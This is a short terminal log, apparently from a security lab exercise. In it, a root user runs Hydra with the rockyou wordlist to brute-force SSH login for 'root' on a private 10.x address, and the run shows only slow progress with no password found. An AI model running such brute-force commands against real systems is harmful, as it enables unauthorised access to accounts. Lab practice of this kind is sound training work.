root@ip-10-201-95-161:~#
root@ip-10-201-95-161:~# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.201.48.99
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-06 19:44:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
^C
root@ip-10-201-95-161:~# hydra -l root -P /usr/share/wordlists/rockyou.txt -t 4 ssh://10.201.48.99
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-06 19:45:10
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.201.48.99:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344354 to do in 5433:29h, 4 active
[STATUS] 34.67 tries/min, 104 tries in 00:03h, 14344294 to do in 6896:18h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344194 to do in 8203:23h, 4 active
[STATUS] 29.60 tries/min, 444 tries in 00:15h, 14343954 to do in 8076:34h, 4 active